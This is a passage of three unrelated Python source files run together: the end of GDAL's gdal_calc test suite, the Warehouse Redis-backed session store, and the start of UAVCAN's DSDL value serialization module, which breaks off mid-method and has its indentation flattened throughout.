opts_counter_counter = opts_counter_counter + 1
idx = opts_counter_counter
return format_temp_filename(test_id, idx, is_opt)
def make_temp_filename_list(test_id, test_count, is_opt=False):
return list(make_temp_filename(test_id, is_opt) for _ in range(test_count))
def test_gdal_calc_py_1():
""" test basic copy """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 1, 3
out = make_temp_filename_list(test_id, test_count)
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --calc=A --overwrite --outfile {}'.format(infile, out[0]))
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band=2 --calc=A --overwrite --outfile {}'.format(infile, out[1]))
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-Z {} --Z_band=2 --calc=Z --overwrite --outfile {}'.format(infile, out[2]))
for i, checksum in zip(range(test_count), (input_checksum[0], input_checksum[1], input_checksum[1])):
check_file(out[i], checksum, i+1)
def test_gdal_calc_py_2():
""" test simple formulas """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 2, 3
out = make_temp_filename_list(test_id, test_count)
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band 1 -B {} --B_band 2 --calc=A+B --overwrite --outfile {}'.format(infile, infile, out[0]))
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band 1 -B {} --B_band 2 --calc=A*B --overwrite --outfile {}'.format(infile, infile, out[1]))
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band 1 --calc="sqrt(A)" --type=Float32 --overwrite --outfile {}'.format(infile, out[2]))
for i, checksum in zip(range(test_count), (12368, 62785, 47132)):
check_file(out[i], checksum, i+1)
#
def test_gdal_calc_py_3():
""" test --allBands option (simple copy) """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 3, 1
out = make_temp_filename_list(test_id, test_count)
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --allBands A --calc=A --overwrite --outfile {}'.format(infile, out[0]))
bnd_count = 4
for i, checksum in zip(range(bnd_count), input_checksum[0:bnd_count]):
check_file(out[0], checksum, 1, bnd_idx=i+1)
def test_gdal_calc_py_4():
""" test --allBands option (simple calc) """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 4, 3
out = make_temp_filename_list(test_id, test_count)
# some values are clipped to 255, but this doesn't matter... small values were visually checked
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --calc=1 --overwrite --outfile {}'.format(infile, out[0]))
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} -B {} --B_band 1 --allBands A --calc=A+B --NoDataValue=999 --overwrite --outfile {}'.format(infile, out[0], out[1]))
bnd_count = 3
for i, checksum in zip(range(bnd_count), (29935, 13128, 59092)):
check_file(out[1], checksum, 2, bnd_idx=i+1)
# these values were not tested
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} -B {} --B_band 1 --allBands A --calc=A*B --NoDataValue=999 --overwrite --outfile {}'.format(infile, infile, out[2]))
bnd_count = 3
for i, checksum in zip(range(bnd_count), (10025, 62785, 10621)):
check_file(out[2], checksum, 3, bnd_idx=i+1)
def test_gdal_calc_py_5():
""" test python interface, basic copy """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 5, 4
out = make_temp_filename_list(test_id, test_count)
gdal_calc.Calc('A', A=infile, overwrite=True, quiet=True, outfile=out[0])
gdal_calc.Calc('A', A=infile, A_band=2, overwrite=True, quiet=True, outfile=out[1])
gdal_calc.Calc('Z', Z=infile, Z_band=2, overwrite=True, quiet=True, outfile=out[2])
gdal_calc.Calc(['A', 'Z'], A=infile, Z=infile, Z_band=2, overwrite=True, quiet=True, outfile=out[3])
for i, checksum in zip(range(test_count), (input_checksum[0], input_checksum[1], input_checksum[1])):
check_file(out[i], checksum, i+1)
bnd_count = 2
for i, checksum in zip(range(bnd_count), (input_checksum[0], input_checksum[1])):
check_file(out[3], checksum, 4, bnd_idx=i+1)
def test_gdal_calc_py_6():
""" test nodata """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
test_id, test_count = 6, 2
out = make_temp_filename_list(test_id, test_count)
gdal.Translate(out[0], '../gcore/data/byte.tif', options='-a_nodata 74')
gdal_calc.Calc('A', A=out[0], overwrite=True, quiet=True, outfile=out[1], NoDataValue=1)
for i, checksum in zip(range(test_count), (4672, 4673)):
ds = check_file(out[i], checksum, i+1)
if i == 1:
result = ds.GetRasterBand(1).ComputeRasterMinMax()
assert result == (90, 255), 'Error! min/max not correct!'
ds = None
def test_gdal_calc_py_7():
""" test --optfile """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 7, 4
out = make_temp_filename_list(test_id, test_count)
opt_files = make_temp_filename_list(test_id, test_count, is_opt=True)
with open(opt_files[0], 'w') as f:
f.write('-A {} --calc=A --overwrite --outfile {}'.format(infile, out[0]))
# Lines in optfiles beginning with '#' should be ignored
with open(opt_files[1], 'w') as f:
f.write('-A {} --A_band=2 --calc=A --overwrite --outfile {}'.format(infile, out[1]))
f.write('\n# -A_band=1')
# options on separate lines should work, too
opts = '-Z {}'.format(infile), '--Z_band=2', '--calc=Z', '--overwrite', '--outfile {}'.format(out[2])
with open(opt_files[2], 'w') as f:
for i in opts:
f.write(i + '\n')
# double-quoted options should be read as single arguments. Mixed numbers of arguments per line should work.
opts = '-Z {} --Z_band=2'.format(infile), '--calc "Z + 0"', '--overwrite --outfile {}'.format(out[3])
with open(opt_files[3], 'w') as f:
for i in opts:
f.write(i + '\n')
for i, checksum in zip(range(test_count), (input_checksum[0], input_checksum[1], input_checksum[1], input_checksum[1])):
test_py_scripts.run_py_script(script_path, 'gdal_calc', '--optfile {}'.format(opt_files[i]))
check_file(out[i], checksum, i+1)
def test_gdal_calc_py_8():
""" test multiple calcs """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 8, 1
out = make_temp_filename_list(test_id, test_count)
test_py_scripts.run_py_script(
script_path, 'gdal_calc',
'-A {} --A_band=1 -B {} --B_band=2 -Z {} --Z_band=2 --calc=A --calc=B --calc=Z --overwrite --outfile {}'.
format(infile, infile, infile, out[0]))
bnd_count = 3
for i, checksum in zip(range(bnd_count), (input_checksum[0], input_checksum[1], input_checksum[1])):
check_file(out[0], checksum, 1, bnd_idx=i+1)
def my_sum(a, gdal_dt=None):
""" sum using numpy """
np_dt = GDALTypeCodeToNumericTypeCode(gdal_dt)
concatenate = np.stack(a)
ret = concatenate.sum(axis=0, dtype=np_dt)
return ret
def my_max(a):
""" max using numpy """
concatenate = np.stack(a)
ret = concatenate.max(axis=0)
return ret
def test_gdal_calc_py_9():
"""
test calculating sum in different ways. testing the following features:
* noDataValue
* user_namespace
* using output ds
* mem driver (no output file)
* single alpha for multiple datasets
* extent = 'fail'
"""
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 9, 9
out = make_temp_filename_list(test_id, test_count)
common_kwargs = {
'hideNoData': True,
'overwrite': True,
'extent': 'fail',
}
inputs0 = dict()
inputs0['a'] = infile
total_bands = 3
checksums = [input_checksum[0], input_checksum[1], input_checksum[2]]
inputs = []
keep_ds = [True, False, False]
for i in range(total_bands):
bnd_idx = i + 1
inputs0['a_band'] = bnd_idx
outfile = out[i]
return_ds = keep_ds[i]
kwargs = copy(common_kwargs)
kwargs.update(inputs0)
ds = gdal_calc.Calc(calc='a', outfile=outfile, **kwargs)
if return_ds:
input_file = ds
else:
# the dataset must be closed if we are to read it again
del ds
input_file = outfile
inputs.append(input_file)
check_file(input_file, checksums[i], i+1)
inputs1 = dict()
inputs1['a'] = inputs[0]
inputs1['b'] = inputs[1]
inputs1['c'] = inputs[2]
inputs2 = {'a': inputs}
write_output = True
outfile = [out[i] if write_output else None for i in range(test_count)]
i = total_bands
checksum = 13256
kwargs = copy(common_kwargs)
kwargs.update(inputs1)
check_file(gdal_calc.Calc(calc='numpy.max((a,b,c),axis=0)', outfile=outfile[i], **kwargs), checksum, i)
i += 1
kwargs = copy(common_kwargs)
kwargs.update(inputs2)
check_file(gdal_calc.Calc(calc='numpy.max(a,axis=0)', outfile=outfile[i], **kwargs), checksum, i)
i += 1
kwargs = copy(common_kwargs)
kwargs.update(inputs2)
check_file(gdal_calc.Calc(calc='my_neat_max(a)', outfile=outfile[i], user_namespace={'my_neat_max': my_max}, **kwargs), checksum, i)
i += 1
# for summing 3 bytes we'll use GDT_UInt16
gdal_dt = gdal.GDT_UInt16
np_dt = GDALTypeCodeToNumericTypeCode(gdal_dt)
# sum with overflow
checksum = 12261
kwargs = copy(common_kwargs)
kwargs.update(inputs1)
check_file(gdal_calc.Calc(calc='a+b+c', type=gdal_dt, outfile=outfile[i], **kwargs), checksum, i)
i += 1
# sum with numpy function, no overflow
checksum = 12789
kwargs = copy(common_kwargs)
kwargs.update(inputs2)
check_file(gdal_calc.Calc(calc='numpy.sum(a,axis=0,dtype=np_dt)', type=gdal_dt, outfile=outfile[i], user_namespace={'np_dt': np_dt}, **kwargs), checksum, i)
i += 1
# sum with my custom numpy function
kwargs = copy(common_kwargs)
kwargs.update(inputs2)
check_file(gdal_calc.Calc(calc='my_neat_sum(a, out_dt)', type=gdal_dt, outfile=outfile[i], user_namespace={'my_neat_sum': my_sum, 'out_dt': gdal_dt}, **kwargs), checksum, i)
i += 1
def test_gdal_calc_py_cleanup():
""" cleanup all temporary files that were created in this pytest """
global temp_counter_dict
global opts_counter_counter
temp_files = []
for test_id, count in temp_counter_dict.items():
for i in range(count):
name = format_temp_filename(test_id, i+1)
temp_files.append(name)
for i in range(opts_counter_counter):
name = format_temp_filename(test_id, i+1, True)
temp_files.append(name)
for filename in temp_files:
try:
os.remove(filename)
except OSError:
pass
|
# Copyright 2014 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import re
import msgpack
import msgpack.exceptions
from werkzeug.contrib.sessions import SessionStore, Session as _Session
from warehouse.utils import random_token, vary_by
SESSION_COOKIE_NAME = "session_id"
class RedisSessionStore(SessionStore):
valid_key_regex = re.compile(r"^[<KEY>")
max_age = 12 * 60 * 60 # 12 hours
def __init__(self, redis, session_class=None, _random_token=random_token):
super(RedisSessionStore, self).__init__(session_class=session_class)
self.redis = redis
self._random_token = _random_token
def _redis_key(self, sid):
return "warehouse/session/data/{}".format(sid)
def generate_key(self, salt=None):
return self._random_token()
def is_valid_key(self, key):
return self.valid_key_regex.search(key) is not None
def get(self, sid):
# Ensure we have a valid key, if not generate a new one
if not self.is_valid_key(sid):
return self.new()
# Fetch the serialized data from redis
bdata = self.redis.get(self._redis_key(sid))
# If the session doesn't exist in redis, we'll give the user a new
# session
if bdata is None:
return self.new()
try:
data = msgpack.unpackb(bdata, encoding="utf8", use_list=True)
except (
msgpack.exceptions.UnpackException,
msgpack.exceptions.ExtraData):
# If the session data was invalid we'll give the user a new session
return self.new()
# If we were able to load existing session data, load it into a
# Session class
session = self.session_class(data, sid, False)
# Refresh the session in redis to prevent early expiration
self.refresh(session)
# Finally return our saved session
return session
def save(self, session):
# Save the session in redis
self.redis.setex(
self._redis_key(session.sid),
self.max_age,
msgpack.packb(session, encoding="utf8", use_bin_type=True),
)
def delete(self, session):
# Delete the session in redis
self.redis.delete(self._redis_key(session.sid))
def refresh(self, session):
# Refresh the session in redis
self.redis.expire(self._redis_key(session.sid), self.max_age)
def cycle(self, session):
# Create a new session with all of the data from the old one
new_session = self.new()
new_session.update(session)
# Delete the old session now that we've copied the data
self.delete(session)
# Return the new session
return new_session
class Session(_Session):
def __init__(self, *args, **kwargs):
super(Session, self).__init__(*args, **kwargs)
self.cycled = False
self.deleted = False
def cycle(self):
self.cycled = True
def delete(self):
self.deleted = True
def handle_session(fn):
@functools.wraps(fn)
def wrapped(self, view, app, request, *args, **kwargs):
# Short little alias for the session store to make it easier to refer
# to
store = app.session_store
# Look up the session id from the request, and either create a new
# session or fetch the existing one from the session store
sid = request.cookies.get(SESSION_COOKIE_NAME, None)
session = store.new() if sid is None else store.get(sid)
# Stick the session on the request, but in a private variable. If
# a view wants to use the session it should use @uses_session to move
# it to request.session and appropriately vary by Cookie
request._session = session
# Call our underlying function in order to get the response to this
# request
resp = fn(self, view, app, request, *args, **kwargs)
# Check to see if the session has been marked to be deleted, if it has
# tell our session store to delete it, and tell our response to delete
# the session cookie as well, and then finally short circuit and return
# our response.
if session.deleted:
# Delete in our session store
store.delete(session)
# Delete the cookie in the browser
resp.delete_cookie(SESSION_COOKIE_NAME)
# Check to see if the session has been marked to be cycled or not.
# When cycling a session we copy all of the data into a new session
# and delete the old one.
if session.cycled:
session = store.cycle(session)
# Check to see if the session has been marked to be saved, generally
# this means that the session data has been modified and thus we need
# to store the new data.
if session.should_save:
store.save(session)
# Whenever we store new data for our session, we want to issue a
# new Set-Cookie header so that our expiration date for this
# session gets reset.
resp.set_cookie(
SESSION_COOKIE_NAME,
session.sid,
secure=request.is_secure,
httponly=True,
)
# Finally return our response
return resp
# Set an attribute so that we can verify the dispatch_view has had session
# support enabled
wrapped._sessions_handled = True
return wrapped
def uses_session(fn):
@functools.wraps(fn)
@vary_by("Cookie")
def wrapper(app, request, *args, **kwargs):
# Add the session onto the request object
request.session = request._session
# Call the underlying function
return fn(app, request, *args, **kwargs)
return wrapper
|
#
# Copyright (C) 2014-2015 UAVCAN Development Team <uavcan.org>
#
# This software is distributed under the terms of the MIT License.
#
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
from __future__ import division, absolute_import, print_function, unicode_literals
import sys
import time
import math
import copy
import struct
import functools
try:
import collections.abc # Python 3
MutableSequence = collections.abc.MutableSequence
except ImportError:
import collections # Python 2
MutableSequence = collections.MutableSequence
import uavcan
import uavcan.dsdl as dsdl
import uavcan.dsdl.common as common
try:
long # Python 2
except NameError:
long = int # Python 3
if sys.version_info[0] < 3:
bchr = chr
else:
def bchr(x):
return bytes([x])
def get_uavcan_data_type(obj):
# noinspection PyProtectedMember
return obj._type
def is_union(obj):
if not isinstance(obj, CompoundValue):
raise ValueError('Only CompoundValue can be union')
# noinspection PyProtectedMember
return obj._is_union
def get_active_union_field(obj):
if not is_union(obj):
raise ValueError('Object is not a union')
# noinspection PyProtectedMember
return obj._union_field
def switch_union_field(obj, value):
if not is_union(obj):
raise ValueError('Object is not a union')
# noinspection PyProtectedMember
obj._union_field = value
def get_fields(obj):
if not isinstance(obj, CompoundValue):
raise ValueError('Only CompoundValue can have fields')
# noinspection PyProtectedMember
return obj._fields
def get_constants(obj):
if not isinstance(obj, CompoundValue):
raise ValueError('Only CompoundValue can have constants')
# noinspection PyProtectedMember
return obj._constants
def is_request(obj):
# noinspection PyProtectedMember
return obj._mode == 'request'
def is_response(obj):
# noinspection PyProtectedMember
return obj._mode == 'response'
def bits_from_bytes(s):
return "".join(format(c, "08b") for c in s)
def bytes_from_bits(s):
#pad bytes if not a multiple of 8
if len(s) % 8 != 0:
s += '0' * (8 - len(s) % 8)
return bytearray(int(s[i:i + 8], 2) for i in range(0, len(s), 8))
def be_from_le_bits(s, bitlen):
if len(s) < bitlen:
raise ValueError("Not enough bits; need {0} but got {1}".format(bitlen, len(s)))
elif len(s) > bitlen:
s = s[0:bitlen]
return "".join([s[i:i + 8] for i in range(0, len(s), 8)][::-1])
def le_from_be_bits(s, bitlen):
if len(s) < bitlen:
raise ValueError("Not enough bits; need {0} but got {1}".format(bitlen, len(s)))
elif len(s) > bitlen:
s = s[len(s) - bitlen:]
return "".join([s[max(0, i - 8):i] for i in range(len(s), 0, -8)])
def format_bits(s):
return " ".join(s[i:i + 8] for i in range(0, len(s), 8))
def union_tag_bits_from_num_elements(num_elements):
return int(math.ceil(math.log(num_elements, 2)))
def array_len_bits_from_max_size(max_size):
return int(math.ceil(math.log(max_size+1, 2)))
def enum_mark_last(iterable, start=0):
"""
Returns a generator over iterable that tells whether the current item is the last one.
Usage:
>>> iterable = range(10)
>>> for index, is_last, item in enum_mark_last(iterable):
>>> print(index, item, end='\n' if is_last else ', ')
"""
it = iter(iterable)
count = start
try:
last = next(it)
except StopIteration:
return
for val in it:
yield count, False, last
last = val
count += 1
yield count, True, last
class Float32IntegerUnion(object):
"""
Yes we've got ourselves a tiny little union here:
union FloatIntegerUnion
{
std::uint32_t u;
float f;
};
This is madness.
"""
def __init__(self, integer=None, floating_point=None):
self._bytes = struct.pack("=L", 0)
if integer is not None:
assert floating_point is None
self.u = int(integer)
if floating_point is not None:
self.f = float(floating_point)
@property
def f(self):
return struct.unpack("=f", self._bytes)[0]
@f.setter
def f(self, value):
assert isinstance(value, float)
self._bytes = struct.pack("=f", value)
@property
def u(self):
return struct.unpack("=I", self._bytes)[0]
@u.setter
def u(self, value):
assert isinstance(value, (int, long))
self._bytes = struct.pack("=I", value)
def f16_from_f32(float32):
# Directly translated from libuavcan's implementation in C++
f32infty = Float32IntegerUnion(integer=255 << 23)
f16infty = Float32IntegerUnion(integer=31 << 23)
magic = Float32IntegerUnion(integer=15 << 23)
inval = Float32IntegerUnion(floating_point=float32)
sign_mask = 0x80000000
round_mask = ~0xFFF
sign = inval.u & sign_mask
inval.u ^= sign
if inval.u >= f32infty.u: # Inf or NaN (all exponent bits set)
out = 0x7FFF if inval.u > f32infty.u else 0x7C00
else:
inval.u &= round_mask
inval.f *= magic.f
inval.u -= round_mask
if inval.u > f16infty.u:
inval.u = f16infty.u # Clamp to signed infinity if overflowed
out = (inval.u >> 13) & 0xFFFF # Take the bits!
return out | (sign >> 16) & 0xFFFF
def f32_from_f16(float16):
# Directly translated from libuavcan's implementation in C++
magic = Float32IntegerUnion(integer=(254 - 15) << 23)
was_inf_nan = Float32IntegerUnion(integer=(127 + 16) << 23)
out = Float32IntegerUnion(integer=(float16 & 0x7FFF) << 13) # exponent/mantissa bits
out.f *= magic.f # exponent adjust
if out.f >= was_inf_nan.f: # make sure Inf/NaN survive
out.u |= 255 << 23
out.u |= (float16 & 0x8000) << 16 # sign bit
return out.f
def cast(value, dtype):
if dtype.cast_mode == dsdl.PrimitiveType.CAST_MODE_SATURATED:
if value > dtype.value_range[1]:
value = dtype.value_range[1]
elif value < dtype.value_range[0]:
value = dtype.value_range[0]
return value
elif dtype.cast_mode == dsdl.PrimitiveType.CAST_MODE_TRUNCATED and dtype.kind == dsdl.PrimitiveType.KIND_FLOAT:
if not math.isnan(value) and value > dtype.value_range[1]:
value = float("+inf")
elif not math.isnan(value) and value < dtype.value_range[0]:
value = float("-inf")
return value
elif dtype.cast_mode == dsdl.PrimitiveType.CAST_MODE_TRUNCATED:
return value & ((1 << dtype.bitlen) - 1)
else:
raise ValueError("Invalid cast_mode: " + repr(dtype))
class BaseValue(object):
# noinspection PyUnusedLocal
def __init__(self, _uavcan_type, *_args, **_kwargs):
self._type = _uavcan_type
self._bits = None
def _unpack(self, stream, tao):
if self._type.bitlen:
self._bits = be_from_le_bits(stream, self._type.bitlen)
return stream[self._type.bitlen:]
else:
return stream
def _pack(self, tao):
if self._bits:
return le_from_be_bits(self._bits, self._type.bitlen)
else:
return "0" * self._type.bitlen
class VoidValue(BaseValue):
def _unpack(self, stream, tao):
return stream[self._type.bitlen:]
def _pack(self, tao):
return "0" * self._type.bitlen
class PrimitiveValue(BaseValue):
def __init__(self, _uavcan_type, *args, **kwargs):
super(PrimitiveValue, self).__init__(_uavcan_type, *args, **kwargs)
# Default initialization
self.value = 0
def __repr__(self):
return repr(self.value)
@property
def value(self):
if not self._bits:
return None
int_value = int(self._bits, 2)
if self._type.kind == dsdl.PrimitiveType.KIND_BOOLEAN:
return bool(int_value)
elif self._type.kind == dsdl.PrimitiveType.KIND_UNSIGNED_INT:
return int_value
elif self._type.kind == dsdl.PrimitiveType.KIND_SIGNED_INT:
if int_value >= (1 << (self._type.bitlen - 1)):
int_value = -((1 << self._type.bitlen) - int_value)
return int_value
elif self._type.kind == dsdl.PrimitiveType.KIND_FLOAT:
if self._type.bitlen == 16:
return f32_from_f16(int_value)
elif self._type.bitlen == 32:
return struct.unpack("<f", struct.pack("<L", int_value))[0]
elif self._type.bitlen == 64:
return struct.unpack("<d", struct.pack("<Q", int_value))[0]
else:
raise ValueError('Bad float')
@value.setter
def value(self, new_value):
if new_value is None:
raise ValueError("Can't serialize a None value")
elif self._type.kind == dsdl.PrimitiveType.KIND_BOOLEAN:
self._bits = "1" if new_value else "0"
elif self._type.kind == dsdl.PrimitiveType.KIND_UNSIGNED_INT:
new_value = cast(new_value, self._type)
self._bits = format(new_value, "0" + str(self._type.bitlen) + "b")
elif self._type.kind == dsdl.PrimitiveType.KIND_SIGNED_INT:
new_value = cast(new_value, self._type)
if new_value < 0: # Computing two's complement for negatives
new_value += 2 ** self._type.bitlen
self._bits = format(new_value, "0" + str(self._type.bitlen) + "b")
elif self._type.kind == dsdl.PrimitiveType.KIND_FLOAT:
new_value = cast(new_value, self._type)
if self._type.bitlen == 16:
int_value = f16_from_f32(new_value)
elif self._type.bitlen == 32:
int_value = struct.unpack("<L", struct.pack("<f", new_value))[0]
elif self._type.bitlen == 64:
int_value = struct.unpack("<Q", struct.pack("<d", new_value))[0]
else:
raise ValueError('Bad float, no donut')
self._bits = format(int_value, "0" + str(self._type.bitlen) + "b")
# noinspection PyProtectedMember
class ArrayValue(BaseValue, MutableSequence):
def __init__(self, _uavcan_type, *args, **kwargs):
super(ArrayValue, self).__init__(_uavcan_type, *args, **kwargs)
if isinstance(self._type.value_type, dsdl.PrimitiveType):
self.__item_ctor = functools.partial(PrimitiveValue, self._type.value_type)
elif isinstance(self._type.value_type, dsdl.ArrayType):
self.__item_ctor = functools.partial(ArrayValue, self._type.value_type)
elif isinstance(self._type.value_type, dsdl.CompoundType):
self.__item_ctor = functools.partial(CompoundValue, self._type.value_type)
if self._type.mode == dsdl.ArrayType.MODE_STATIC:
self.__items = list(self.__item_ctor() for _ in range(self._type.max_size))
else:
self.__items = []
def __repr__(self):
return "ArrayValue(type={0!r}, items={1!r})".format(self._type, self.__items)
def __str__(self):
if self._type.is_string_like:
# noinspection PyBroadException
try:
return self.decode()
except Exception:
pass
return self.__repr__()
def __getitem__(self, idx):
if isinstance(self.__items[idx], PrimitiveValue):
return self.__items[idx].value if self.__items[idx]._bits else 0
else:
return self.__items[idx]
def __setitem__(self, idx, value):
if idx >= self._type.max_size:
raise IndexError("Index {0} too large (max size {1})".format(idx, self._type.max_size))
if isinstance(self._type.value_type, dsdl.PrimitiveType):
self.__items[idx].value = value
else:
self.__items[idx] = value
def __delitem__(self, idx):
del self.__items[idx]
def __len__(self):
return len(self.__items)
def __eq__(self, other):
if isinstance(other, str):
return self.decode() == other
else:
return list(self) == other
def clear(self):
try:
while True:
self.pop()
except IndexError:
pass
def new_item(self):
return self.__item_ctor()
def insert(self, idx, value):
if idx >= self._type.max_size:
raise IndexError("Index {0} too large (max size {1})".format(idx, self._type.max_size))
elif len(self) == self._type.max_size:
raise IndexError("Array already full (max size {0})".format(self._type.max_size))
if isinstance(self._type.value_type, dsdl.PrimitiveType):
new_item = self.__item_ctor()
new_item.value = value
self.__items.insert(idx, new_item)
else:
self.__items.insert(idx, value)
def _unpack(self, stream, tao):
if self._type.mode == dsdl.ArrayType.MODE_STATIC:
for _, last, i in enum_mark_last(range(self._type.max_size)):
stream = self.__items[i]._unpack(stream, tao and last)
elif tao and self._type.value_type.get_min_bitlen() >= 8:
del self[:]
while len(stream) >= 8:
new_item = self.__item_ctor()
stream = new_item._unpack(stream, False)
self.__items.append(new_item)
stream = ''
else:
del self[:]
count_width = array_len_bits_from_max_size(self._type.max_size)
count = int(be_from_le_bits(stream[0:count_width], count_width), 2)
stream = stream[count_width:]
for _, last, i in enum_mark_last(range(count)):
new_item = self.__item_ctor()
stream = new_item._unpack(stream, tao and last)
self.__items.append(new_item)
return stream
def _pack(self, tao):
self.__items = self.__items[:self._type.max_size] # Constrain max len
if self._type.mode == dsdl.ArrayType.MODE_STATIC:
while len(self) < self._type.max_size: # Constrain min len
self.__items.append(self.new_item())
return ''.join(i._pack(tao and last) for _, last, i in enum_mark_last(self.__items))
elif tao and self._type.value_type.get_min_bitlen() >= 8:
return ''.join(i._pack(False) for i in self.__items)
else:
count_width = array_len_bits_from_max_size(self._type.max_size)
count = le_from_be_bits(format(len(self), '0{0:1d}b'.format(count_width)), count_width)
return count + ''.join(i._pack(tao and last) for _, last, i in enum_mark_last(self.__items))
def from_bytes(self, value):
del self[:]
for byte in bytearray(value):
self.append(byte)
def to_bytes(self):
return bytes(bytearray(item.value for item in self.__items if item._bits))
def encode(self, value, errors='strict'):
if not self._type.is_string_like:
raise ValueError('encode() can be used only with string-like arrays')
del self[:]
value = bytearray(value, encoding="utf-8", errors=errors)
for byte in value:
self.append(byte)
def decode(self, encoding="utf-8"):
if not self._type.is_string_like:
raise ValueError('decode() can be used only with string-like arrays')
return bytearray(item.value for item in self.__items if item._bits).decode(encoding)
# noinspection PyProtectedMember
class CompoundValue(BaseValue):
def __init__(self, _uavcan_type, _mode=None, *args, **kwargs):
self.__dict__["_fields"] = collections.OrderedDict()
self.__dict__["_constants"] = {}
super(CompoundValue, self).__init__(_uavcan_type, *args, **kwargs)
if self._type.kind == dsdl.CompoundType.KIND_SERVICE:
if _mode == "request":
source_fields = self._type.request_fields
source_constants = self._type.request_constants
self._is_union = self._type.request_union
elif _mode == "response":
source_fields = self._type.response_fields
source_constants = self._type.response_constants
self._is_union = self._type.response_union
else:
raise ValueError("mode must be either 'request' or 'response' for service types")
else:
if _mode is not None:
raise ValueError("mode is not applicable for message types")
source_fields = self._type.fields
source_constants = self._type.constants
self._is_union = self._type.union
self._mode = _mode
self._union_field = None
for constant in source_constants:
self._constants[constant.name] = constant.value
for idx, field in enumerate(source_fields):
if isinstance(field.type, dsdl.VoidType):
self._fields["_void_{0}".format(idx)] = VoidValue(field.type)
elif isinstance(field.type, dsdl.PrimitiveType):
self._fields[field.name] = PrimitiveValue(field.type)
elif isinstance(field.type, dsdl.ArrayType):
self._fields[field.name] = ArrayValue(field.type)
elif isinstance(field.type, dsdl.CompoundType):
self._fields[field.name] = CompoundValue(field.type)
for name, value in kwargs.items():
if name.startswith('_'):
raise NameError('%r is not a valid field name' % name)
setattr(self, name, value)
def __repr__(self):
if self._is_union:
field = self._union_field or list(self._fields.keys())[0]
fields = "{0}={1!r}".format(field, self._fields[field])
else:
fields = ", ".join("{0}={1!r}".format(f, v) for f, v in self._fields.items() if not f.startswith("_void_"))
return "{0}({1})".format(self._type.full_name, fields)
def __copy__(self):
# http://stackoverflow.com/a/15774013/1007777
cls = self.__class__
result = cls.__new__(cls)
result.__dict__.update(self.__dict__)
return result
def __deepcopy__(self, memo):
# http://stackoverflow.com/a/15774013/1007777
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
for k, v in self.__dict__.items():
# noinspection PyArgumentList
result.__dict__[k] = copy.deepcopy(v, memo)
return result
def __getattr__(self, attr):
if attr in self._constants:
return self._constants[attr]
elif attr in self._fields:
if self._is_union:
if self._union_field and self._union_field != attr:
raise AttributeError(attr)
else:
self._union_field = attr
if isinstance(self._fields[attr], PrimitiveValue):
return self._fields[attr].value
else:
return self._fields[attr]
else:
raise AttributeError(attr)
def __setattr__(self, attr, value):
if attr in self._constants:
raise AttributeError(attr + " is read-only")
elif attr in self._fields:
if self._is_union:
if self._union_field and self._union_field != attr:
raise AttributeError(attr)
else:
self._union_field = attr
# noinspection PyProtectedMember
attr_type = self._fields[attr]._type
if isinstance(attr_type, dsdl.PrimitiveType):
self._fields[attr].value = value
elif isinstance(attr_type, dsdl.CompoundType):
if not isinstance(value, CompoundValue):
raise AttributeError('Invalid type of the value, expected CompoundValue, got %r' % type(value))
if attr_type.full_name != get_uavcan_data_type(value).full_name:
raise AttributeError('Incompatible type of the value, expected %r, got %r' %
(attr_type.full_name, get_uavcan_data_type(value).full_name))
